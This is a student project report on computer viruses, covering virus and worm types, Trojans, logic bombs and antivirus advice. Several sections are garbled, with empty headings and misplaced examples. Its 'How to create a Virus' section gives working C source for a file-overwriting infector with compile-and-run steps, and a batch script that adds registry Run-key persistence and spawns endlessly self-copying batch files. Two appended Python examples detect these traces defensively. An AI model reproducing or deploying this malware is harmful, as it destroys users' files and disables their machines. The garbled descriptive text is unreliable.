HCE-108
PROJECT
BY
VINAY KUMAR
Project Topic:
Computer Virus
Introduction to computer virus:
What is a computer virus?
In computer security, a computer virus is a self-replicating
(self-reproducing) computer program that spreads by inserting
copies of itself into other executable code or documents. A
computer virus behaves in a way similar to a biological virus,
which spreads by inserting itself into living cells. Extending the
analogy, the insertion of a virus into a program is termed an
"infection", and the infected file, or executable code that is not
part of a file, is called a "host". Viruses are one of several types
of malicious software, or malware.
While viruses can be intentionally destructive, for example by
destroying data, many other viruses are fairly benign or merely
annoying. Some viruses have a delayed payload, which is
sometimes called a bomb. For example, a virus might display a
message on a specific day or wait until it has infected a certain
number of hosts. A time bomb goes off on a particular date or at a
particular time, and a logic bomb goes off when the user of a
computer takes an action that triggers it. However, the
predominant negative effect of viruses is their uncontrolled
self-reproduction, which wastes or overwhelms computer resources.
Definition:
Computer viruses are broadly classified into the following
categories:
• Macro virus
• Polymorphic viruses
• Stealth viruses
• Multi-partite viruses
Boot sector virus:
Boot sector viruses are those that infect the boot sector on a
computer system. They first move or overwrite the original boot
code, replacing it with infected boot code. They will then move
the original boot sector information to another sector on the
disk, marking that sector as a bad spot on the disk so it will not
be used in the future. Boot sector viruses can be very difficult to
detect since the boot sector is the first thing loaded when a
computer starts. In effect, the virus takes full control of the
infected computer.
Examples:
Form, Disk killer, Michelangelo, Stoned.
Examples:
AntiEXE, Unashamed, NYB
File infector virus:
Examples:
Snow.A,
Jerusalem,
Cascade
Macro virus:
Examples:
Concept,
Nimda,
Melissa.
Polymorphic viruses:
Stealth viruses:
Multi-partite viruses:
Multi-partite viruses are those that infect both boot sectors and
executable files. They are the worst viruses of all because they
can combine some or all of the stealth techniques, along with
polymorphism to prevent detection.
Destructive non-virus programs:
• Worms
• Trojan Horses
• Logic Bombs
Worms:
Viruses are far from the only maverick programs that can disrupt
a computer system. Worms are constructed to infiltrate
legitimate data processing programs and alter or destroy the
data. Often what people believe is a virus infection is, in fact, a
worm program. This is not as serious because worms do not
replicate themselves. But the damage caused by a worm attack
can be just as serious as a virus, especially if not discovered in
time. For example, suppose a worm program instructs a bank’s
computer to transfer funds to an illicit account. The fund
transfers may continue even after the worm is destroyed.
However, once the worm invasion is discovered, recovery is
much easier because there is only a single copy of the worm
program to destroy, since the replicating ability of a virus is
absent. In a virus, that capability may enable it to re-infect a
system several times. A worm is similar to a benign tumor, while
a virus is like a malignant one.
Definition:
Computer worms:-
Blaster,
Code red,
Fog,
ILOVEYOU,
WANK,
Witty.
Trojan horses:
Trojan Horses are usually more subtle, especially when they are
used for embezzlement or industrial espionage. They can be
programmed to self-destruct, leaving no evidence other than the
damage they have caused. A Trojan Horse is particularly
effective for the common banking crime known as ‘salami
slicing’ in which small sums unlikely to be noticed are sliced off
a number of legitimate accounts and moved to a secret account
being operated by the thief.
Definition:
Trojan horse:
A Trojan is another type of malicious software that appears to
perform a certain action but in fact performs another.
Often these hidden actions serve only harmful purposes,
like:
• AIDS
• Beast Trojan
• Bifrost
• Nuclear RAT (NR, NucRat)
• Insurrection
• Bandook
• Optix Pro
• Shark
Logic Bombs:
The built-in delay has been used to hold software “hostage” until
a ransom is paid. These ransom demands are usually announced
via a message to the user warning them to “pay up and we will
tell you how to turn off the bomb”. Logic bombs can also be
insurance for suppliers or consultants who set up a computer
system, causing data to be destroyed if their bills are not paid.
This threat was used when a Maryland library refused to pay for
a system that did not function properly; fortunately the bomb
was found before any data could be damaged. When trying to
assess whether a computer system has fallen victim to a virus,
logic bomb, worm or Trojan horse.
How viruses affect and infect your PC.
Before you can safeguard your system against viruses, it’s
important to understand how they spread and what they do to
infected systems. The best virus protection program is
consistent, ongoing education of computer users about the virus
threat. Even with the proliferation of on-line services and
communications, most viruses are still spread via infected floppy
disks. The front line in the war against viruses must be fought by
the user who is about to put a disk into the drive. Without an
effective, ongoing education campaign, virus fighting efforts
will be doomed to lighting backfires against infections already in
place.
• An instructor distributes disks to students so they can
complete a class assignment. One student decides to do his
homework in the office at night. Unfortunately, the instructor
was not vigilant and distributed infected disks to the entire class.
• A friend gives you a disk so you can try out a new graphics
program. The infection on your friend’s machine spreads to
yours when you run the program for the first time. (The nifty
graphics available don’t quite compensate for the three weeks
you spend reconstructing your lost data files.)
Common virus infection symptoms:
Of course, these are not the only symptoms that may present
themselves if you have a virus. The best way to detect a virus is
to use anti-virus software, which is described in the following
sections.
TIPS to protect from VIRUSES:
Viruses can come from many different origins, so it is important
to protect yourself from potential problems.
ANTIVIRUS SOFTWARE:
Anti-virus software is any software that protects your computer
from viruses, or eradicates viruses that have already been
contracted on the computer. Below are some popular anti-virus
programs and links to their corresponding web pages. It should
be mentioned, however, that many of these sites (as well as other
sites) may offer free software or trial software. Also, here at
BGSU, you can obtain free copies of virus software. An un-
keyed version of virus software can be downloaded from the
BGSU software server at http://software.bgsu.edu/ when
students are on campus. BGSU has a site license for McAfee
Virus Scan for the PC and Virex for the Mac.
ALADDIN ESAFE
Aladdin eSafe :-
MCAFEE VIRUSSCAN
McAfee:
Norton Antivirus:
Using antivirus is a must ….
This fig. will show you how the antivirus helps to detect viruses
in your PC.
You have to change the settings of the antivirus you are using in
order to delete or move the virus etc...
Learning more about computer Virus:
• Trend Micro Virus Information Center
(www.antivirus.com/vinfo/)
• Viruslist.com (www.viruslist.com)
SUMMARY
How to create a Virus
#include<stdio.h>
#include<io.h>
#include<dos.h>
#include<dir.h>
#include<conio.h>
#include<time.h>
FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;
void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}
COMPILING METHOD:
3. Note down the size of generated EXE file in bytes (SEE EXE
FILE PROPERTIES FOR IT’S SIZE)
4. Change the value of X in the source code with the noted down
size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE
IT)
5. Once again follow the STEP 1 & STEP 2.Now the generated
EXE File is ready to infect
HOW TO TEST:
3. Run the virus EXE file there you will see all the files in the
current directory get infected.
That’s it
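As an added example (not part of the original project), the Python check below looks for the footprint the listing above leaves behind: several files of unrelated types in one directory that all begin with the same executable image. The 2048-byte comparison window, the extension list and the sample files are assumptions constructed for the demonstration.

```python
import hashlib
import os
import tempfile
from collections import defaultdict

PREFIX_LEN = 2048   # assumption: compare the first 2 KiB (the listing's buffer size)
EXEC_EXTS = {".exe", ".dll", ".com", ".sys"}   # assumption: types expected to start with "MZ"

def scan_directory(path, min_cluster=3):
    """Return {prefix_sha256: [file names]} for groups of files that share an
    identical leading block, start with the DOS/PE "MZ" magic, and include at
    least one file whose extension is not an executable type."""
    clusters = defaultdict(list)
    for entry in sorted(os.scandir(path), key=lambda e: e.name):
        if not entry.is_file(follow_symlinks=False):
            continue
        with open(entry.path, "rb") as fh:
            head = fh.read(PREFIX_LEN)
        if len(head) < PREFIX_LEN or not head.startswith(b"MZ"):
            continue
        clusters[hashlib.sha256(head).hexdigest()].append(entry.name)
    return {
        digest: names
        for digest, names in clusters.items()
        if len(names) >= min_cluster
        and any(os.path.splitext(n)[1].lower() not in EXEC_EXTS for n in names)
    }

def build_demo_directory():
    """Constructed sample data: three files whose start was replaced by one
    inert "MZ"-prefixed block, plus two untouched files."""
    root = tempfile.mkdtemp(prefix="overwrite_demo_")
    stamp = b"MZ" + bytes(range(256)) * 8      # 2050 inert bytes, not a program
    samples = {
        "report.doc": stamp + b"tail of the old document",
        "photo.jpg": stamp + b"tail of the old image",
        "notes.txt": stamp,
        "clean.txt": b"plain text " * 300,
        "tool.exe": b"MZ" + b"\x00" * 4000,
    }
    for name, data in samples.items():
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(data)
    return root

if __name__ == "__main__":
    for digest, names in scan_directory(build_demo_directory()).items():
        print(digest[:16], names)
```

A hit means the affected files have lost their original leading bytes, so recovery is from backup rather than by cleaning the files in place.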
The batch script below creates a .reg file and imports it into the
registry. It then creates a file in C:\ called 2.bat. The 2.bat file
copies itself into other files and opens them; each file does the same
as 2.bat, but they each loop, so it keeps on opening other batches that
each loop and open other batches. The only way out is to boot in safe
mode.
del C:\1.reg
>>"C:\1.reg" ECHO windows Registry Editor Version 5.00
>>"C:\1.reg" ECHO
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\windows
\Cur rentVersion\Run]
>>"C:\1.reg" ECHO "MSConfig"="C:\\1.bat "
>>"C:\1.reg" ECHO "MCUpdateExe"="c:\\2.bat"
>>"C:\1.reg" ECHO "explorer"="c:\\3.bat"
>>"C:\1.reg" ECHO "Norton"="c:\\windows\\1.bat"
>>"C:\1.reg" ECHO "System"="c:\\windows\\2.bat"
>>"C:\1.reg" ECHO "autoexec"="c:\\windows\\3.bat"
regedit.exe /s C:\1.reg
>>"C:\2.bat" ECHO :1
>>"C:\2.bat" ECHO copy 2.bat C:\3.bat
>>"C:\2.bat" ECHO copy 2.bat C:\4.bat
>>"C:\2.bat" ECHO copy 2.bat C:\5.bat
>>"C:\2.bat" ECHO start C:\2.bat
>>"C:\2.bat" ECHO start C:\3.bat
>>"C:\2.bat" ECHO start C:\4.bat
>>"C:\2.bat" ECHO start C:\5.bat
>>"C:\2.bat" ECHO copy C:\2.bat C:\windows\1.bat
>>"C:\2.bat" ECHO copy C:\3.bat C:\windows\2.bat
>>"C:\2.bat" ECHO copy C:\4.bat C:\windows\3.bat
>>"C:\2.bat" ECHO start C:\windows\1.bat
>>"C:\2.bat" ECHO start C:\windows\2.bat
>>"C:\2.bat" ECHO start C:\windows\3.bat
>>"C:\2.bat" ECHO goto 1
start 2.bat
del C:\1.reg
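An added example, not from the original project: a Python check that reads a registry export (.reg text) and reports Run/RunOnce values that launch a script file or a file sitting in a drive root or directly in the Windows directory, which is the pattern the batch listing above writes. The export is constructed sample data; WINDOWS_DIR and the extension list are assumptions.

```python
import ntpath
import re

SCRIPT_EXTS = {".bat", ".cmd", ".vbs", ".js"}   # assumption: script types to flag
WINDOWS_DIR = r"c:\windows"                     # assumption: default %SystemRoot%
RUN_KEY = re.compile(r"\\currentversion\\run(once)?$", re.IGNORECASE)
VALUE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')

# Constructed sample export; the two .bat values reuse names from the listing above.
SAMPLE_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"MCUpdateExe"="c:\\2.bat"
"Norton"="c:\\windows\\1.bat"
"VendorAgent"="\"C:\\Program Files\\Vendor\\agent.exe\" /background"

[HKEY_LOCAL_MACHINE\SOFTWARE\Vendor\Settings]
"Helper"="c:\\helper.bat"
'''

def audit_run_keys(reg_text):
    """Return (value name, target path, reasons) for each Run/RunOnce entry
    that launches a script or a file in a drive root or the Windows directory."""
    findings, key = [], ""
    for raw in reg_text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        m = VALUE.match(line)
        if not m or not RUN_KEY.search(key):
            continue
        # .reg strings escape backslash and double quote with a backslash
        command = re.sub(r"\\(.)", r"\1", m.group(2)).strip()
        hit = re.match(r'"?([^"]*?\.\w{2,4})\b', command)
        target = hit.group(1) if hit else command
        parent = ntpath.dirname(target).lower()
        reasons = []
        if ntpath.splitext(target)[1].lower() in SCRIPT_EXTS:
            reasons.append("script file")
        if re.fullmatch(r"[a-z]:\\?", parent):
            reasons.append("drive root")
        if parent == WINDOWS_DIR:
            reasons.append("Windows directory")
        if reasons:
            findings.append((m.group(1), target, reasons))
    return findings

if __name__ == "__main__":
    for name, target, reasons in audit_run_keys(SAMPLE_EXPORT):
        print(f"{name}: {target} ({', '.join(reasons)})")
```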